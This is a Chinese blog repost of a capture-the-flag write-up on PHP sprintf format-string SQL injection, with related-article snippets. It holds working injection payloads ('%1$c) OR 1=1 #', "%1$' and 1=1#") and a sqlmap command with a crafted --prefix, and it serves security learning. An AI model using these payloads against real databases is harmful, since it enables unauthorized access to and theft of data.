php sprintf格式化注入

最新推荐文章于 2023-02-17 15:32:54 发布
最新推荐文章于 2023-02-17 15:32:54 发布
阅读量196 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/nul1/p/9374422.html
版权

URL:http://efa4e2c2b8df4ce69454639f4e3727071652c31167f341a4.game.ichunqiu.com/

简单的说就是sprintf中%1$\'会将\吃掉,导致'的逃逸。%后表示第几个参数,$表示参数类型。

还有一个sprintf漏洞的利用方式:%c起到了类似chr()的效果,将数字39转化为',从而导致了sql注入。

1 <?php
2  
3 $input1 = '%1$c) OR 1=1 #';
4 $input2 = 39;
5 $sql = "SELECT * FROM foo WHERE bar IN ('$input1') AND baz = %s";
6 $sql = sprintf($sql, $input2);
7 echo $sql;
8 ?>

在这题中,--prefix加个前缀丢进sqlmap跑就好了。

虽然是post

  sqlmap -r /home/1.txt -p username --prefix="%1$'"

--prefix 前缀

--suffix 后缀

其实也可以直接*

转载于:https://www.cnblogs.com/nul1/p/9374422.html

weixin_30302609
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php中巧用sprintf组合sql语句
时光清浅处,一步一安然
08-24 1708
php中,拼接mysql的语句时,通常情况下,会使用点操作符,如下: $user_id = 1; $subject = '哲学'; $sql = "select * from scores where `user_id`=".$user_id." and `subject`='".$subject."'"; 以这种方式来拼接sql,会比较繁琐,尤其是当参数比较多的时候,下面,利用ph
Spring常用的注入方式
qq_44077791的博客
06-13 1038
Spring支持的常用注入方式有属性注入(setter注入),构造函数器注入,工厂方法注入。 1. 属性注入(setter注入) 属性注入指通过setXXX()方法注入bean的属性值或依赖对象。具有可选性和灵活性高的特点。要求bean提供一个默认的构造函数(无参),为注入的属性提供对应的setter方法。 例: package test; public class User { private ...
深入解析sprintf格式化字符串带来的注入隐患
QL_2023的博客
02-17 208
sprintf() 函数把格式化的字符串写入变量中。sprintf(format , arg1 , arg2 , arg ++) arg1、arg2、 ++ 参数将被插入到主字符串中的百分( % )符处。该函数是逐步执行的。在第一个 % 符处,插入 arg1,在第二个 % 符处,插入 arg2,依此类推。注释:如果 % 符多于 arg 参数,则您必须使用占位符。占位符位于 % 符之后,由数字和 "\$" 组成。
深入解析sprintf格式化字符串漏洞
KKABqN
03-14 1万+
深入解析sprintf格式化字符串漏洞 0x00 前言 从相遇到相识 从相识到相知 ......... 不过你真的懂ta吗 这次故事的主角是PHP中的格式化函数sprintf 具体详见:http://bey0nd.xyz/2018/11/05/1/ 0x01 sprintf()讲解 首先我们先了解sprintf()函数 sprintf() 函数把格式化的字符串写入变......
php sprintf函数引起的sql注入
黑面狐
03-11 3005
sprintf函数作用: sprintf() 函数把格式化的字符串写入变量中。 arg1、arg2、++ 参数将被插入到主字符串中的百分(%)符处。该函数是逐步执行的。在第一个 % 符处,插入 arg1,在第二个 % 符处,插入 arg2,依此类推。 注释:如果 % 符多于 arg 参数,则您必须使用占位符。占位符位于 % 符之后,由数字和 "\$" 组成 测试1.php文件...
php 格式化数字的时候注意数字的范围
10-29
这可以避免字符串拼接可能导致的SQL注入问题,并且由于浮点数格式化符的范围更广,可以适应更大数值的ID。 除了`%d`和`%.0f`之外,还有其他格式化符供我们选择: - `%b`:将整数转换为二进制表示。 - `%c`:将整数...
php sprintf()函数让你的sql操作更安全
10-30
在标题和描述中提到的,`sprintf()` 主要用于字符串格式化,它能有效地防止 SQL 注入攻击。 在 SQL 操作中,我们经常需要将变量插入到 SQL 语句中,如更新或查询记录。例如,给定的代码片段展示了如何使用 `sprintf...
PHP sprintf()函数用例解析
12-18
`PHP` 的 `sprintf()` 和 `printf()` 函数都是用于格式化字符串的工具,它们能够帮助程序员精确控制字符串输出的格式,包括数字的精度、填充字符、对齐方式等。这两个函数在语法上非常相似,但有一个关键的区别在于...
PHP特性(网友整理1)1
08-03
`sprintf()`可以格式化输出字符串,但如果不正确使用,可能会导致类型转换错误和注入漏洞。 2. `mt_rand()`函数 `mt_rand()`是PHP中的随机数生成函数,如果在安全性相关的场景中使用不当,可能会被利用进行预测或...
基于PHP常用函数的用法详解
10-27
- `sprintf()`:格式化字符串,但不输出,而是返回结果。 - `printf()`:格式化字符串并直接输出。 - `print()`:简单地输出一个字符串。 - `echo`:可以同时输出多个字符串,效率比`print`高。 - `print_r()`...
sprintf的使用
热门推荐
weixin_43224243的博客
09-17 6万+
这几天总遇到sprintf,下面自己来小小地总结下~ srpintf()函数的功能非常强大:效率比一些字符串操作函数要高;而且更具灵活性;可以将想要的结果输出到指定的字符串中,也可作为缓冲区,而printf只能输出到命令行上~ 头文件:stdio.h 函数功能:格式化字符串,将格式化的数据写入字符串中。 函数原型:int sprintf(char *buffer, const char *fo...
sprintf
jeromezmzx007的博客
06-04 1110
sprintf 字符串格式化命令,主要功能是把格式化的数据写入某个字符串中。sprintf 是个变参函数。 转换字符 %% 印出百分比符,不转换。 %c 整数转成对应的 ASCII 字元。 %d 整数转成十进位。 %f 倍精确度数字转成浮点数。 %o 整数转成八进位。 %s 整数转成字符串。 %x 整数转成小写十六进位。 %X 整数转成大写十六进位。 //把整数123 打印成一个字符串保存在s ...
[php漏洞]sprintf漏洞
胖胖的ALEX
10-24 739
定义 sprintf()函数把格式化的字符串写入一个变量 语法 sprintf(format, arg1, arg2, arg++) 示例 <?php $number = 6; $str = 'xiaoming'; $ret = sprintf('hello, %s! today is %d', $str, $number); echo $ret; 执行输出结果如下: hello, xi...
sprintf格式化字符串带来的注入隐患
weixin_30236595的博客
11-12 443
原文链接:https://paper.seebug.org/386/ 摘要点关键知识点 <?php $input = addslashes("%1$' and 1=1#"); $b = sprintf("AND b='%s'", $input); ... $sql = sprintf("SELECT * FROM t WHERE a='%s' $b", 'admin');...
php中sql格式化字符串,sqli注入-sprintf格式化字符串带来的注入隐患
weixin_42193786的博客
04-02 213
PHPsprintf()格式化输出详解sprintf()函数把格式化的字符串写入变量中。arg1、arg2、++参数将被插入到主字符串中的百分(%)符处。该函数是逐步执行的。在第一个%符处,插入arg1,在第二个%符处,插入arg2,以此类推。注释:如果%符多于arg参数,则您必须使用占位符。占位符位于%符之后,由数字和“\$”组成。$number = 2;$str = "Shan...
stm32用sprintf格式化数据
最新发布
12-02
在STM32中,可以使用sprintf()函数将数据格式化为字符串。以下是一个简单的例子,演示了如何使用sprintf()函数将整型数据和浮点型数据格式化为字符串: ...然后,使用printf()函数打印出格式化后的字符串。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值